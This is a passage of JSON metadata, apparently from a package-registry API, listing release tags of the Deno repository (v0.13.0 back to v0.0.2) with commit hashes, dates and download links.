t","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2